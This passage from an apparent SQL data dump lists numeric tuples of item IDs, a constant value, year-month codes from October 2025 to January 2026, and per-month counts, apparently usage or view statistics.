,(5298,2,'202510',35),(5330,2,'202510',35),(486,2,'202510',36),(1610,2,'202510',36),(1614,2,'202510',36),(1770,2,'202510',36),(1780,2,'202510',36),(2159,2,'202510',36),(3316,2,'202510',36),(3742,2,'202510',36),(4524,2,'202510',36),(4694,2,'202510',36),(5314,2,'202510',36),(476,2,'202510',37),(3066,2,'202510',37),(3253,2,'202510',37),(4275,2,'202510',37),(4373,2,'202510',37),(4688,2,'202510',37),(5146,2,'202510',37),(471,2,'202510',38),(485,2,'202510',38),(1774,2,'202510',38),(3072,2,'202510',38),(3724,2,'202510',38),(3731,2,'202510',38),(3735,2,'202510',38),(4332,2,'202510',38),(4517,2,'202510',38),(5310,2,'202510',38),(5323,2,'202510',38),(110,2,'202510',39),(1711,2,'202510',39),(2161,2,'202510',39),(3534,2,'202510',39),(3721,2,'202510',39),(4412,2,'202510',39),(4454,2,'202510',39),(4756,2,'202510',39),(5301,2,'202510',39),(5304,2,'202510',39),(5320,2,'202510',39),(1596,2,'202510',40),(2989,2,'202510',40),(3038,2,'202510',40),(3273,2,'202510',40),(3489,2,'202510',40),(4335,2,'202510',40),(4587,2,'202510',40),(5153,2,'202510',40),(472,2,'202510',41),(3271,2,'202510',41),(3774,2,'202510',41),(4645,2,'202510',41),(5157,2,'202510',41),(5317,2,'202510',41),(1606,2,'202510',42),(3030,2,'202510',42),(3710,2,'202510',42),(3777,2,'202510',42),(4400,2,'202510',42),(1724,2,'202510',43),(3006,2,'202510',43),(3127,2,'202510',43),(3752,2,'202510',43),(4566,2,'202510',43),(4648,2,'202510',43),(4759,2,'202510',43),(5307,2,'202510',43),(2558,2,'202510',44),(4582,2,'202510',44),(4722,2,'202510',44),(5128,2,'202510',44),(5353,2,'202510',44),(5374,2,'202510',44),(1594,2,'202510',45),(1705,2,'202510',45),(2809,2,'202510',45),(3034,2,'202510',45),(3045,2,'202510',45),(3117,2,'202510',45),(4753,2,'202510',45),(5042,2,'202510',45),(1584,2,'202510',46),(1612,2,'202510',46),(4420,2,'202510',46),(4608,2,'202510',46),(4651,2,'202510',46),(4741,2,'202510',46),(4977,2,'202510',46),(5383,2,'202510',46),(2956,2,'202510',47),(4301,2,'202510',47),(4660,2,'202510',47),(3251,2,'202510',48),(4529,2,'202510',48),(5378,2,'202510',48),(1600,2,'202510',49),(1604,2,'202510',49),(3259,2,'202510',49),(3290,2,'202510',49),(4681,2,'202510',49),(1766,2,'202510',50),(2804,2,'202510',51),(2993,2,'202510',51),(5276,2,'202510',51),(5585,2,'202510',51),(2769,2,'202510',52),(4520,2,'202510',52),(4874,2,'202510',52),(5125,2,'202510',52),(4712,2,'202510',53),(469,2,'202510',54),(488,2,'202510',54),(3486,2,'202510',54),(3307,2,'202510',55),(3069,2,'202510',56),(4750,2,'202510',56),(5472,2,'202510',56),(1728,2,'202510',57),(3313,2,'202510',58),(4983,2,'202510',59),(1718,2,'202510',61),(2658,2,'202510',61),(2911,2,'202510',61),(3749,2,'202510',61),(2297,2,'202510',63),(5062,2,'202510',65),(5363,2,'202510',65),(5467,2,'202510',65),(1588,2,'202510',67),(3023,2,'202510',67),(5280,2,'202510',67),(5582,2,'202510',67),(2309,2,'202510',68),(4556,2,'202510',69),(3297,2,'202510',71),(5259,2,'202510',72),(1722,2,'202510',74),(2775,2,'202510',74),(487,2,'202510',75),(3083,2,'202510',75),(5400,2,'202510',78),(5567,2,'202510',78),(1608,2,'202510',81),(5076,2,'202510',81),(5415,2,'202510',82),(5425,2,'202510',82),(5412,2,'202510',83),(1598,2,'202510',84),(473,2,'202510',86),(5433,2,'202510',87),(2704,2,'202510',89),(4612,2,'202510',90),(3102,2,'202510',92),(5163,2,'202510',92),(5489,2,'202510',92),(5515,2,'202510',93),(1544,2,'202510',94),(4930,2,'202510',94),(5601,2,'202510',95),(2813,2,'202510',98),(5461,2,'202510',101),(5464,2,'202510',101),(1586,2,'202510',103),(5428,2,'202510',103),(5441,2,'202510',105),(5449,2,'202510',106),(3060,2,'202510',107),(87,2,'202510',109),(335,2,'202510',110),(2503,2,'202510',110),(5454,2,'202510',111),(5561,2,'202510',111),(108,2,'202510',113),(5457,2,'202510',113),(5512,2,'202510',114),(84,2,'202510',115),(5397,2,'202510',117),(5436,2,'202510',118),(5409,2,'202510',119),(5492,2,'202510',120),(5578,2,'202510',124),(474,2,'202510',125),(74,2,'202510',127),(5598,2,'202510',127),(468,2,'202510',129),(3781,2,'202510',130),(5593,2,'202510',136),(5406,2,'202510',140),(5570,2,'202510',141),(2904,2,'202510',146),(1778,2,'202510',149),(467,2,'202510',154),(76,2,'202510',159),(91,2,'202510',165),(5502,2,'202510',167),(5420,2,'202510',191),(89,2,'202510',213),(5605,2,'202510',243),(72,2,'202510',256),(1582,2,'202510',262),(68,2,'202510',377),(470,2,'202510',392),(80,2,'202510',1034),(9,2,'202510',10806),(106,2,'202511',18),(4792,2,'202511',19),(5046,2,'202511',20),(4797,2,'202511',21),(3245,2,'202511',22),(3265,2,'202511',22),(3275,2,'202511',22),(4802,2,'202511',22),(3249,2,'202511',23),(3280,2,'202511',23),(3285,2,'202511',23),(4444,2,'202511',23),(4858,2,'202511',23),(479,2,'202511',24),(2991,2,'202511',24),(4396,2,'202511',24),(4428,2,'202511',24),(482,2,'202511',25),(2293,2,'202511',25),(2296,2,'202511',25),(3243,2,'202511',25),(4368,2,'202511',25),(3273,2,'202511',26),(488,2,'202511',27),(1592,2,'202511',27),(2161,2,'202511',27),(3240,2,'202511',27),(3247,2,'202511',27),(3269,2,'202511',27),(4382,2,'202511',27),(4587,2,'202511',27),(4591,2,'202511',27),(4862,2,'202511',27),(4888,2,'202511',27),(5067,2,'202511',27),(3226,2,'202511',28),(5050,2,'202511',28),(478,2,'202511',29),(1697,2,'202511',29),(1707,2,'202511',29),(1726,2,'202511',29),(1768,2,'202511',29),(1776,2,'202511',29),(1782,2,'202511',29),(2751,2,'202511',29),(4391,2,'202511',29),(5020,2,'202511',29),(5042,2,'202511',29),(1699,2,'202511',30),(1715,2,'202511',30),(1720,2,'202511',30),(1743,2,'202511',30),(3096,2,'202511',30),(3257,2,'202511',30),(3742,2,'202511',30),(5256,2,'202511',30),(484,2,'202511',31),(2159,2,'202511',31),(2558,2,'202511',31),(2748,2,'202511',31),(3079,2,'202511',31),(3229,2,'202511',31),(3263,2,'202511',31),(4275,2,'202511',31),(4357,2,'202511',31),(4387,2,'202511',31),(4685,2,'202511',31),(476,2,'202511',32),(480,2,'202511',32),(483,2,'202511',32),(1749,2,'202511',32),(2156,2,'202511',32),(2252,2,'202511',32),(4301,2,'202511',32),(4326,2,'202511',32),(4373,2,'202511',32),(4448,2,'202511',32),(4608,2,'202511',32),(4747,2,'202511',32),(4765,2,'202511',32),(4870,2,'202511',32),(5024,2,'202511',32),(5330,2,'202511',32),(2063,2,'202511',33),(2150,2,'202511',33),(3092,2,'202511',33),(3109,2,'202511',33),(3278,2,'202511',33),(3287,2,'202511',33),(3534,2,'202511',33),(3727,2,'202511',33),(3738,2,'202511',33),(4408,2,'202511',33),(4771,2,'202511',33),(4866,2,'202511',33),(4996,2,'202511',33),(5374,2,'202511',33),(5472,2,'202511',33),(102,2,'202511',34),(471,2,'202511',34),(481,2,'202511',34),(486,2,'202511',34),(1709,2,'202511',34),(1772,2,'202511',34),(1774,2,'202511',34),(2148,2,'202511',34),(2248,2,'202511',34),(2989,2,'202511',34),(3041,2,'202511',34),(3107,2,'202511',34),(3251,2,'202511',34),(3259,2,'202511',34),(4432,2,'202511',34),(4454,2,'202511',34),(4566,2,'202511',34),(4883,2,'202511',34),(4897,2,'202511',34),(5028,2,'202511',34),(5080,2,'202511',34),(1732,2,'202511',35),(1734,2,'202511',35),(2993,2,'202511',35),(3072,2,'202511',35),(3261,2,'202511',35),(3267,2,'202511',35),(4404,2,'202511',35),(4412,2,'202511',35),(4700,2,'202511',35),(4706,2,'202511',35),(4988,2,'202511',35),(5058,2,'202511',35),(1590,2,'202511',36),(1711,2,'202511',36),(1713,2,'202511',36),(2965,2,'202511',36),(3063,2,'202511',36),(3498,2,'202511',36),(3531,2,'202511',36),(4677,2,'202511',36),(5334,2,'202511',36),(1739,2,'202511',37),(1747,2,'202511',37),(1770,2,'202511',37),(2154,2,'202511',37),(3097,2,'202511',37),(3127,2,'202511',37),(3271,2,'202511',37),(4323,2,'202511',37),(4377,2,'202511',37),(4756,2,'202511',37),(5037,2,'202511',37),(5137,2,'202511',37),(485,2,'202511',38),(1705,2,'202511',38),(3087,2,'202511',38),(3541,2,'202511',38),(4363,2,'202511',38),(4440,2,'202511',38),(4524,2,'202511',38),(4976,2,'202511',38),(5131,2,'202511',38),(5271,2,'202511',38),(5383,2,'202511',38),(1596,2,'202511',39),(1745,2,'202511',39),(2152,2,'202511',39),(2964,2,'202511',39),(3290,2,'202511',39),(3479,2,'202511',39),(3714,2,'202511',39),(4420,2,'202511',39),(4668,2,'202511',39),(4878,2,'202511',39),(5033,2,'202511',39),(5353,2,'202511',39),(1737,2,'202511',40),(1751,2,'202511',40),(2801,2,'202511',40),(3735,2,'202511',40),(4424,2,'202511',40),(4542,2,'202511',40),(4582,2,'202511',40),(5326,2,'202511',40),(2911,2,'202511',41),(3005,2,'202511',41),(3282,2,'202511',41),(3710,2,'202511',41),(4338,2,'202511',41),(4654,2,'202511',41),(4657,2,'202511',41),(4674,2,'202511',41),(4691,2,'202511',41),(4709,2,'202511',41),(4759,2,'202511',41),(5071,2,'202511',41),(5264,2,'202511',41),(5304,2,'202511',41),(5378,2,'202511',41),(2609,2,'202511',42),(2617,2,'202511',42),(3034,2,'202511',42),(3104,2,'202511',42),(4546,2,'202511',42),(4645,2,'202511',42),(5054,2,'202511',42),(5314,2,'202511',42),(5320,2,'202511',42),(5323,2,'202511',42),(5359,2,'202511',42),(1730,2,'202511',43),(2178,2,'202511',43),(3746,2,'202511',43),(4332,2,'202511',43),(4762,2,'202511',43),(5101,2,'202511',43),(5248,2,'202511',43),(5253,2,'202511',43),(5356,2,'202511',43),(1722,2,'202511',44),(3006,2,'202511',44),(3066,2,'202511',44),(4517,2,'202511',44),(4651,2,'202511',44),(4697,2,'202511',44),(5122,2,'202511',44),(5140,2,'202511',44),(5153,2,'202511',44),(2165,2,'202511',45),(3004,2,'202511',45),(3027,2,'202511',45),(3731,2,'202511',45),(4416,2,'202511',45),(4648,2,'202511',45),(4703,2,'202511',45),(4893,2,'202511',45),(5268,2,'202511',45),(5295,2,'202511',45),(5609,2,'202511',45),(477,2,'202511',46),(1718,2,'202511',46),(1741,2,'202511',46),(3124,2,'202511',46),(3430,2,'202511',46),(3721,2,'202511',46),(3724,2,'202511',46),(3771,2,'202511',46),(5128,2,'202511',46),(5582,2,'202511',46),(1703,2,'202511',47),(3489,2,'202511',47),(4694,2,'202511',47),(4753,2,'202511',47),(4768,2,'202511',47),(5289,2,'202511',47),(3090,2,'202511',48),(3316,2,'202511',48),(3438,2,'202511',48),(4329,2,'202511',48),(5301,2,'202511',48),(5363,2,'202511',48),(5467,2,'202511',48),(472,2,'202511',49),(3482,2,'202511',49),(5636,2,'202511',49),(4612,2,'202511',50),(4744,2,'202511',50),(4874,2,'202511',50),(3307,2,'202511',51),(4238,2,'202511',51),(4741,2,'202511',51),(5146,2,'202511',51),(5298,2,'202511',51),(5317,2,'202511',51),(1766,2,'202511',52),(3486,2,'202511',52),(4514,2,'202511',52),(4712,2,'202511',52),(5134,2,'202511',52),(5292,2,'202511',52),(5310,2,'202511',52),(4688,2,'202511',53),(4980,2,'202511',53),(110,2,'202511',54),(2804,2,'202511',54),(3764,2,'202511',54),(3777,2,'202511',54),(4529,2,'202511',54),(5585,2,'202511',54),(1695,2,'202511',55),(3117,2,'202511',55),(3749,2,'202511',55),(4551,2,'202511',55),(4556,2,'202511',55),(4776,2,'202511',55),(4400,2,'202511',56),(4977,2,'202511',56),(5307,2,'202511',56),(473,2,'202511',57),(2457,2,'202511',57),(2769,2,'202511',57),(4436,2,'202511',57),(5125,2,'202511',57),(1606,2,'202511',58),(1724,2,'202511',58),(4663,2,'202511',58),(4750,2,'202511',58),(5157,2,'202511',58),(4341,2,'202511',59),(4681,2,'202511',59),(5492,2,'202511',59),(570,2,'202511',60),(1594,2,'202511',60),(3038,2,'202511',60),(3045,2,'202511',60),(4335,2,'202511',60),(4457,2,'202511',60),(1701,2,'202511',61),(1780,2,'202511',61),(2809,2,'202511',61),(2956,2,'202511',61),(4660,2,'202511',61),(5567,2,'202511',62),(1584,2,'202511',63),(3030,2,'202511',63),(5062,2,'202511',63),(1614,2,'202511',64),(2658,2,'202511',64),(3774,2,'202511',64),(4983,2,'202511',64),(1600,2,'202511',65),(1602,2,'202511',65),(5163,2,'202511',65),(2309,2,'202511',66),(4722,2,'202511',67),(5561,2,'202511',67),(1610,2,'202511',68),(3023,2,'202511',68),(3313,2,'202511',70),(4520,2,'202511',70),(5489,2,'202511',70),(3253,2,'202511',71),(3297,2,'202511',72),(3752,2,'202511',72),(5464,2,'202511',72),(487,2,'202511',73),(5412,2,'202511',73),(5461,2,'202511',73),(1612,2,'202511',75),(5433,2,'202511',75),(74,2,'202511',77),(1598,2,'202511',77),(469,2,'202511',78),(5512,2,'202511',78),(5626,2,'202511',78),(5400,2,'202511',79),(5415,2,'202511',80),(5425,2,'202511',81),(5578,2,'202511',81),(5515,2,'202511',82),(5076,2,'202511',84),(5280,2,'202511',84),(5601,2,'202511',84),(1778,2,'202511',85),(5454,2,'202511',85),(3102,2,'202511',86),(5259,2,'202511',87),(5449,2,'202511',89),(4930,2,'202511',90),(468,2,'202511',91),(1588,2,'202511',92),(3083,2,'202511',92),(335,2,'202511',94),(1604,2,'202511',95),(2503,2,'202511',97),(5593,2,'202511',97),(2775,2,'202511',98),(2297,2,'202511',100),(5436,2,'202511',100),(5570,2,'202511',101),(3069,2,'202511',102),(5441,2,'202511',102),(1586,2,'202511',109),(1608,2,'202511',109),(2904,2,'202511',112),(84,2,'202511',114),(2813,2,'202511',114),(5457,2,'202511',118),(474,2,'202511',119),(108,2,'202511',124),(5409,2,'202511',124),(3060,2,'202511',126),(1728,2,'202511',130),(5502,2,'202511',133),(5397,2,'202511',136),(1544,2,'202511',139),(5276,2,'202511',142),(91,2,'202511',148),(5406,2,'202511',149),(5598,2,'202511',149),(87,2,'202511',166),(3781,2,'202511',167),(5428,2,'202511',168),(2704,2,'202511',173),(76,2,'202511',174),(467,2,'202511',200),(89,2,'202511',205),(5420,2,'202511',213),(5605,2,'202511',229),(72,2,'202511',244),(1582,2,'202511',257),(470,2,'202511',312),(68,2,'202511',363),(80,2,'202511',5211),(9,2,'202511',14404),(106,2,'202512',11),(1709,2,'202512',13),(4897,2,'202512',18),(1697,2,'202512',19),(1741,2,'202512',19),(4648,2,'202512',19),(4706,2,'202512',19),(3245,2,'202512',20),(482,2,'202512',21),(2248,2,'202512',21),(3247,2,'202512',21),(3531,2,'202512',21),(4368,2,'202512',21),(4587,2,'202512',21),(4591,2,'202512',21),(5050,2,'202512',21),(1732,2,'202512',22),(3104,2,'202512',22),(4357,2,'202512',22),(4797,2,'202512',22),(2154,2,'202512',23),(2993,2,'202512',23),(3269,2,'202512',23),(4685,2,'202512',23),(4747,2,'202512',23),(4768,2,'202512',23),(5020,2,'202512',23),(5301,2,'202512',23),(1715,2,'202512',24),(1730,2,'202512',24),(2252,2,'202512',24),(2748,2,'202512',24),(2991,2,'202512',24),(3282,2,'202512',24),(3771,2,'202512',24),(4709,2,'202512',24),(4870,2,'202512',24),(4878,2,'202512',24),(4888,2,'202512',24),(1713,2,'202512',25),(1720,2,'202512',25),(2156,2,'202512',25),(3243,2,'202512',25),(3249,2,'202512',25),(3534,2,'202512',25),(4396,2,'202512',25),(4551,2,'202512',25),(4654,2,'202512',25),(4862,2,'202512',25),(5042,2,'202512',25),(1734,2,'202512',26),(1747,2,'202512',26),(1772,2,'202512',26),(2293,2,'202512',26),(2964,2,'202512',26),(3092,2,'202512',26),(3263,2,'202512',26),(3714,2,'202512',26),(4326,2,'202512',26),(4332,2,'202512',26),(4373,2,'202512',26),(4700,2,'202512',26),(4858,2,'202512',26),(5037,2,'202512',26),(479,2,'202512',27),(480,2,'202512',27),(1590,2,'202512',27),(3240,2,'202512',27),(3257,2,'202512',27),(3275,2,'202512',27),(3316,2,'202512',27),(3727,2,'202512',27),(3738,2,'202512',27),(4524,2,'202512',27),(4792,2,'202512',27),(5289,2,'202512',27),(2165,2,'202512',28),(2296,2,'202512',28),(4329,2,'202512',28),(4404,2,'202512',28),(4416,2,'202512',28),(4514,2,'202512',28),(5046,2,'202512',28),(5253,2,'202512',28),(5271,2,'202512',28),(478,2,'202512',29),(1739,2,'202512',29),(1782,2,'202512',29),(2965,2,'202512',29),(3087,2,'202512',29),(3226,2,'202512',29),(3265,2,'202512',29),(3267,2,'202512',29),(3287,2,'202512',29),(3482,2,'202512',29),(3724,2,'202512',29),(3774,2,'202512',29),(4448,2,'202512',29),(4454,2,'202512',29),(4517,2,'202512',29),(4546,2,'202512',29),(4765,2,'202512',29),(4802,2,'202512',29),(5383,2,'202512',29),(477,2,'202512',30),(485,2,'202512',30),(1737,2,'202512',30),(1745,2,'202512',30),(3079,2,'202512',30),(3271,2,'202512',30),(4275,2,'202512',30),(4338,2,'202512',30),(4382,2,'202512',30),(4387,2,'202512',30),(4424,2,'202512',30),(4428,2,'202512',30),(4432,2,'202512',30),(4582,2,'202512',30),(4677,2,'202512',30),(4996,2,'202512',30),(5295,2,'202512',30),(484,2,'202512',31),(488,2,'202512',31),(1707,2,'202512',31),(1726,2,'202512',31),(1768,2,'202512',31),(2063,2,'202512',31),(2148,2,'202512',31),(3063,2,'202512',31),(3124,2,'202512',31),(3278,2,'202512',31),(3731,2,'202512',31),(4363,2,'202512',31),(4408,2,'202512',31),(4520,2,'202512',31),(4542,2,'202512',31),(4744,2,'202512',31),(4759,2,'202512',31),(4988,2,'202512',31),(5024,2,'202512',31),(5080,2,'202512',31),(5314,2,'202512',31),(5320,2,'202512',31),(483,2,'202512',32),(1596,2,'202512',32),(1749,2,'202512',32),(3251,2,'202512',32),(3280,2,'202512',32),(3438,2,'202512',32),(4301,2,'202512',32),(4566,2,'202512',32),(4694,2,'202512',32),(4703,2,'202512',32),(4771,2,'202512',32),(4883,2,'202512',32),(5054,2,'202512',32),(5101,2,'202512',32),(5378,2,'202512',32),(1699,2,'202512',33),(1770,2,'202512',33),(2161,2,'202512',33),(2751,2,'202512',33),(3096,2,'202512',33),(3107,2,'202512',33),(3229,2,'202512',33),(3273,2,'202512',33),(3430,2,'202512',33),(3489,2,'202512',33),(4608,2,'202512',33),(4756,2,'202512',33),(4893,2,'202512',33),(5122,2,'202512',33),(5334,2,'202512',33),(5353,2,'202512',33),(1695,2,'202512',34),(1743,2,'202512',34),(2150,2,'202512',34),(2558,2,'202512',34),(3066,2,'202512',34),(3097,2,'202512',34),(3498,2,'202512',34),(3541,2,'202512',34),(3735,2,'202512',34),(3746,2,'202512',34),(4657,2,'202512',34),(5137,2,'202512',34),(5310,2,'202512',34),(1776,2,'202512',35),(3005,2,'202512',35),(3090,2,'202512',35),(3109,2,'202512',35),(3285,2,'202512',35),(3721,2,'202512',35),(4323,2,'202512',35),(4412,2,'202512',35),(4440,2,'202512',35),(4762,2,'202512',35),(5330,2,'202512',35),(5374,2,'202512',35),(5472,2,'202512',35),(2989,2,'202512',36),(3127,2,'202512',36),(3777,2,'202512',36),(4391,2,'202512',36),(4651,2,'202512',36),(4697,2,'202512',36),(4866,2,'202512',36),(5256,2,'202512',36),(5304,2,'202512',36),(476,2,'202512',37),(2609,2,'202512',37),(2911,2,'202512',37),(3004,2,'202512',37),(3027,2,'202512',37),(3034,2,'202512',37),(3710,2,'202512',37),(3742,2,'202512',37),(4674,2,'202512',37),(5071,2,'202512',37),(5134,2,'202512',37),(5292,2,'202512',37),(5326,2,'202512',37),(5609,2,'202512',37),(471,2,'202512',38),(486,2,'202512',38),(3041,2,'202512',38),(4444,2,'202512',38),(4688,2,'202512',38),(4691,2,'202512',38),(5140,2,'202512',38),(5268,2,'202512',38),(4377,2,'202512',39),(5128,2,'202512',39),(5131,2,'202512',39),(5298,2,'202512',39),(5317,2,'202512',39),(102,2,'202512',40),(472,2,'202512',40),(1711,2,'202512',40),(3479,2,'202512',40),(4722,2,'202512',40),(5146,2,'202512',40),(5264,2,'202512',40),(1592,2,'202512',41),(1774,2,'202512',41),(2617,2,'202512',41),(2956,2,'202512',41),(4668,2,'202512',41),(5248,2,'202512',41),(1701,2,'202512',42),(1705,2,'202512',42),(1718,2,'202512',42),(1751,2,'202512',42),(2159,2,'202512',42),(2178,2,'202512',42),(3290,2,'202512',42),(4645,2,'202512',42),(4976,2,'202512',42),(1703,2,'202512',43),(3072,2,'202512',43),(3261,2,'202512',43),(3752,2,'202512',43),(4681,2,'202512',43),(5028,2,'202512',43),(5467,2,'202512',43),(5585,2,'202512',43),(481,2,'202512',44),(1606,2,'202512',44),(3749,2,'202512',44),(473,2,'202512',45),(487,2,'202512',45),(1780,2,'202512',45),(3030,2,'202512',45),(3259,2,'202512',45),(5307,2,'202512',45),(2152,2,'202512',46),(3006,2,'202512',46),(4335,2,'202512',46),(4529,2,'202512',46),(4660,2,'202512',46),(4741,2,'202512',46),(4977,2,'202512',46),(5363,2,'202512',46),(5666,2,'202512',46),(2809,2,'202512',47),(3045,2,'202512',47),(4238,2,'202512',47),(4341,2,'202512',47),(4400,2,'202512',47),(4663,2,'202512',47),(4712,2,'202512',47),(5157,2,'202512',47),(1594,2,'202512',48),(4874,2,'202512',48),(5058,2,'202512',48),(5359,2,'202512',48),(5425,2,'202512',48),(1722,2,'202512',50),(1766,2,'202512',50),(2801,2,'202512',50),(4750,2,'202512',50),(4776,2,'202512',50),(3117,2,'202512',52),(3307,2,'202512',52),(5153,2,'202512',53),(4753,2,'202512',54),(5356,2,'202512',54),(3486,2,'202512',55),(5125,2,'202512',55),(5492,2,'202512',55),(5567,2,'202512',55),(5163,2,'202512',56),(5582,2,'202512',56),(1724,2,'202512',57),(2804,2,'202512',57),(5626,2,'202512',57),(1604,2,'202512',58),(3313,2,'202512',58),(1612,2,'202512',59),(3069,2,'202512',60),(5280,2,'202512',60),(1728,2,'202512',61),(5674,2,'202512',62),(3023,2,'202512',63),(4457,2,'202512',63),(5067,2,'202512',63),(1610,2,'202512',64),(2457,2,'202512',64),(3038,2,'202512',65),(4436,2,'202512',65),(4930,2,'202512',65),(1600,2,'202512',66),(3764,2,'202512',67),(4556,2,'202512',67),(4980,2,'202512',67),(2658,2,'202512',68),(5561,2,'202512',68),(570,2,'202512',69),(4612,2,'202512',69),(5441,2,'202512',70),(3083,2,'202512',71),(1614,2,'202512',72),(5415,2,'202512',73),(5512,2,'202512',73),(5605,2,'202512',73),(5449,2,'202512',74),(5636,2,'202512',75),(3297,2,'202512',76),(5593,2,'202512',76),(5409,2,'202512',79),(5433,2,'202512',79),(5464,2,'202512',79),(1598,2,'202512',80),(2309,2,'202512',80),(5323,2,'202512',80),(110,2,'202512',81),(3102,2,'202512',81),(4983,2,'202512',81),(1584,2,'202512',84),(5033,2,'202512',85),(5076,2,'202512',85),(5400,2,'202512',85),(5461,2,'202512',85),(5515,2,'202512',85),(2297,2,'202512',86),(2503,2,'202512',86),(5489,2,'202512',86),(108,2,'202512',88),(5259,2,'202512',88),(469,2,'202512',89),(1778,2,'202512',89),(468,2,'202512',91),(5578,2,'202512',91),(335,2,'202512',94),(4420,2,'202512',94),(5412,2,'202512',94),(5570,2,'202512',94),(5598,2,'202512',95),(5601,2,'202512',95),(87,2,'202512',96),(1608,2,'202512',97),(2769,2,'202512',97),(74,2,'202512',98),(1588,2,'202512',98),(5436,2,'202512',100),(2775,2,'202512',101),(5454,2,'202512',105),(1602,2,'202512',106),(2813,2,'202512',106),(3253,2,'202512',106),(1586,2,'202512',110),(84,2,'202512',113),(5062,2,'202512',120),(5457,2,'202512',122),(3060,2,'202512',127),(2904,2,'202512',129),(474,2,'202512',136),(5428,2,'202512',142),(5397,2,'202512',147),(5406,2,'202512',149),(5502,2,'202512',150),(5662,2,'202512',151),(2704,2,'202512',155),(467,2,'202512',156),(91,2,'202512',157),(5683,2,'202512',160),(1544,2,'202512',168),(89,2,'202512',172),(5420,2,'202512',172),(3781,2,'202512',179),(5276,2,'202512',179),(470,2,'202512',202),(1582,2,'202512',250),(76,2,'202512',271),(72,2,'202512',319),(68,2,'202512',321),(80,2,'202512',2839),(9,2,'202512',12732),(2296,2,'202601',16),(3249,2,'202601',16),(3285,2,'202601',16),(4591,2,'202601',16),(4700,2,'202601',17),(2293,2,'202601',18),(4759,2,'202601',18),(1720,2,'202601',19),(3251,2,'202601',20),(4858,2,'202601',20),(106,2,'202601',21),(3097,2,'202601',21),(4428,2,'202601',21),(4444,2,'202601',21),(3257,2,'202601',22),(4396,2,'202601',22),(4697,2,'202601',22),(4706,2,'202601',22),(1699,2,'202601',23),(2161,2,'202601',23),(3430,2,'202601',23),(4587,2,'202601',23),(4756,2,'202601',23),(4897,2,'202601',23),(1709,2,'202601',24),(1741,2,'202601',24),(3273,2,'202601',24),(3280,2,'202601',24),(3727,2,'202601',24),(4797,2,'202601',24),(5042,2,'202601',24),(1768,2,'202601',25),(2154,2,'202601',25),(2248,2,'202601',25),(3247,2,'202601',25),(3714,2,'202601',25),(4332,2,'202601',25),(4685,2,'202601',25),(5046,2,'202601',25),(1697,2,'202601',26),(3261,2,'202601',26),(3316,2,'202601',26),(3771,2,'202601',26),(4870,2,'202601',26),(4888,2,'202601',26),(5310,2,'202601',26),(1707,2,'202601',27),(1732,2,'202601',27),(1737,2,'202601',27),(1743,2,'202601',27),(3263,2,'202601',27),(4357,2,'202601',27),(4373,2,'202601',27),(4448,2,'202601',27),(5024,2,'202601',27),(5071,2,'202601',27),(1782,2,'202601',28),(2148,2,'202601',28),(4424,2,'202601',28),(4440,2,'202601',28),(4883,2,'202601',28),(5058,2,'202601',28),(5356,2,'202601',28),(1726,2,'202601',29),(2156,2,'202601',29),(3109,2,'202601',29),(3265,2,'202601',29),(3271,2,'202601',29),(3489,2,'202601',29),(4391,2,'202601',29),(4404,2,'202601',29),(4654,2,'202601',29),(4691,2,'202601',29),(4709,2,'202601',29),(4866,2,'202601',29),(5585,2,'202601',29),(1695,2,'202601',30),(2165,2,'202601',30),(3092,2,'202601',30),(4377,2,'202601',30),(4546,2,'202601',30),(4878,2,'202601',30),(4893,2,'202601',30),(5050,2,'202601',30),(5378,2,'202601',30),(5383,2,'202601',30),(1718,2,'202601',31),(4514,2,'202601',31),(4762,2,'202601',31),(4765,2,'202601',31),(5020,2,'202601',31),(5137,2,'202601',31),(5289,2,'202601',31),(2063,2,'202601',32),(2965,2,'202601',32),(3107,2,'202601',32),(3269,2,'202601',32),(3482,2,'202601',32),(3735,2,'202601',32),(4341,2,'202601',32),(4657,2,'202601',32),(4862,2,'202601',32),(5037,2,'202601',32),(5248,2,'202601',32),(5609,2,'202601',32),(2558,2,'202601',33),(2991,2,'202601',33),(3127,2,'202601',33),(3245,2,'202601',33),(4408,2,'202601',33),(4566,2,'202601',33),(4608,2,'202601',33),(4677,2,'202601',33),(4694,2,'202601',33),(4792,2,'202601',33),(5301,2,'202601',33),(1713,2,'202601',34),(3096,2,'202601',34),(3287,2,'202601',34),(4651,2,'202601',34),(5067,2,'202601',34),(5256,2,'202601',34),(5359,2,'202601',34),(5374,2,'202601',34),(5735,2,'202601',34),(1745,2,'202601',35),(1747,2,'202601',35),(1774,2,'202601',35),(1776,2,'202601',35),(2993,2,'202601',35),(3104,2,'202601',35),(3229,2,'202601',35),(3253,2,'202601',35),(3275,2,'202601',35),(3738,2,'202601',35),(4387,2,'202601',35),(4412,2,'202601',35),(4648,2,'202601',35),(4674,2,'202601',35),(4703,2,'202601',35),(5140,2,'202601',35),(1751,2,'202601',36),(2751,2,'202601',36),(3087,2,'202601',36),(4338,2,'202601',36),(4988,2,'202601',36),(1715,2,'202601',37),(2748,2,'202601',37),(3479,2,'202601',37),(3752,2,'202601',37),(4416,2,'202601',37),(4432,2,'202601',37),(4747,2,'202601',37),(4771,2,'202601',37),(5054,2,'202601',37),(479,2,'202601',38),(482,2,'202601',38),(1701,2,'202601',38),(1770,2,'202601',38),(2150,2,'202601',38),(2159,2,'202601',38),(2252,2,'202601',38),(3034,2,'202601',38),(3079,2,'202601',38),(3438,2,'202601',38),(3226,2,'202601',39),(3278,2,'202601',39),(3534,2,'202601',39),(4326,2,'202601',39),(4363,2,'202601',39),(4517,2,'202601',39),(4542,2,'202601',39),(4551,2,'202601',39),(4681,2,'202601',39),(4768,2,'202601',39),(5122,2,'202601',39),(5304,2,'202601',39),(5330,2,'202601',39),(5738,2,'202601',39),(478,2,'202601',40),(485,2,'202601',40),(2989,2,'202601',40),(3282,2,'202601',40),(3541,2,'202601',40),(4744,2,'202601',40),(5320,2,'202601',40),(486,2,'202601',41),(1590,2,'202601',41),(3090,2,'202601',41),(4275,2,'202601',41),(4420,2,'202601',41),(5131,2,'202601',41),(5146,2,'202601',41),(471,2,'202601',42),(3004,2,'202601',42),(3045,2,'202601',42),(3243,2,'202601',42),(4238,2,'202601',42),(4301,2,'202601',42),(4457,2,'202601',42),(5326,2,'202601',42),(5582,2,'202601',42),(481,2,'202601',43),(488,2,'202601',43),(1772,2,'202601',43),(4524,2,'202601',43),(4688,2,'202601',43),(4802,2,'202601',43),(5253,2,'202601',43),(5636,2,'202601',43),(480,2,'202601',44),(484,2,'202601',44),(1739,2,'202601',44),(1749,2,'202601',44),(3041,2,'202601',44),(3531,2,'202601',44),(3710,2,'202601',44),(3731,2,'202601',44),(3774,2,'202601',44),(5028,2,'202601',44),(5101,2,'2